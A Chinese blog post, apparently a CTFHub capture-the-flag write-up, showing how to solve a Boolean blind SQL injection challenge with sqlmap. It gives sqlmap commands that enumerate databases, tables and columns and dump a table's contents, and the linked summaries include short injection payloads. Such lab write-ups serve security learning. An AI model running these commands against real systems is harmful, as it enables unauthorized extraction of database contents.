CTFHub (web-SQL-布尔盲注sqlmap)

已于 2022-05-22 18:57:44 修改
阅读量770 收藏 3
点赞数 1
分类专栏: CTFHub 文章标签: 前端 sql 数据库
于 2022-05-09 21:46:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/124675333
版权

一、关于sqlmap

一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。

二、在Windows上安装sqlmap

kali自带sqlmap
智慧门
Windows上sqlmap命令的两种方式:


 1. python sqlmap.py 命令
 2. sqlmap.py 命令

三、实战解题步骤

1.爆库

sqlmap.py -u URL/?id=1 --dbs

在这里插入图片描述

2.爆表

sqlmap.py -u URL/?id=1 -D sqli --tables

在这里插入图片描述

3.爆字段

sqlmap.py -u URL/?id=1 -D sqli -T flag --columns

在这里插入图片描述

4.爆字段内容

sqlmap.py -u URL/?id=1 -D sqli -T flag -C flag --dump

在这里插入图片描述

小小大空翼
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub-sql布尔盲注
god_001的博客
06-01 679
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 425
个人CTF学习之路
SQL注入之路之二:布尔型(boolean)盲注
weixin_62715196的博客
08-10 1219
简单描述什么是布尔盲注以及对与布尔盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型注入的合理性
CTFHUB-SQL注入-布尔盲注
最新发布
weixin_68416970的博客
06-12 712
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
SQLMap简介
xiaojiakun的博客
12-10 271
简介 SQLMap是一款先进的自动执行SQL注入的审计工具。它可以针对指定URL 进行扫描发现并利用SQL注入漏洞 当给SQLMap一个URL时https://baike.baidu.com/item/%E5%AE%A1%E8%AE%A1%E8%BD%AF%E4%BB%B6/6127577?fr=aladdinSQLMap会执行以下操作 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注...
布尔盲注ctfhub
2401_82985722的博客
03-27 1101
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFhub布尔盲注
ndjnddjxn的博客
04-12 895
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
sqlmap)【sqli-labs8-10】盲注布尔盲注、时间盲注
07-06 3642
sqlmap-跑盲注靶场】
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1233
CTFHUB-WEB-SQL注入
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5458
Ctfhub解题 web SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7102
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1716
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4383
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1829
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入,确定此题为整数型注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHUB-布尔盲注
Web学习之路
03-24 1080
true 与 false
ctfhub 布尔盲注
plant1234的博客
06-17 1570
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
CTFHUB|SQL注入(sqlmap
m0_60651303的博客
07-14 1224
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub——技能树——SQL注入(sqlmap
sparename的博客
12-26 7285
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
CTFhub布尔盲注脚本
qq_41565526的博客
02-04 547
CTFhub布尔盲注脚本
sqlmap布尔盲注
08-10
布尔盲注是一种利用布尔逻辑运算进行SQL注入的技术。在布尔盲注中,攻击者通过构造特定的SQL语句,通过判断某个条件的真假来获取数据库中的信息。 SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员快速发现和利用SQL注入漏洞。在使用SQLMap进行布尔盲注时,你需要提供目标URL、参数名、注入点等信息。SQLMap将自动发送不同的SQL语句,根据程序返回的结果来判断条件是否成立,并进一步推测数据库中的信息。 下面是使用SQLMap进行布尔盲注的一般步骤: 1. 执行基本扫描:通过指定目标URL和参数名,执行基本的SQL注入扫描,以确定是否存在注入漏洞。 2. 确定注入点:如果基本扫描成功,SQLMap将会尝试确定具体的注入位置。 3. 进行布尔盲注:在确认注入点后,SQLMap将自动生成相应的布尔盲注语句,并发送给目标服务器。通过观察服务器返回的页面内容或响应码,SQLMap将根据条件的真假来判断数据库中的信息。 4. 获取数据库信息:如果布尔盲注成功,SQLMap可以继续获取数据库的表名、列名、数据等敏感信息。 需要注意的是,使用SQL注入工具进行测试时,请确保已经得到合法授权,并遵守法律和道德规范。此外,使用自动化工具可能会对目标服务器造成不必要的负载,所以在使用时应谨慎操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值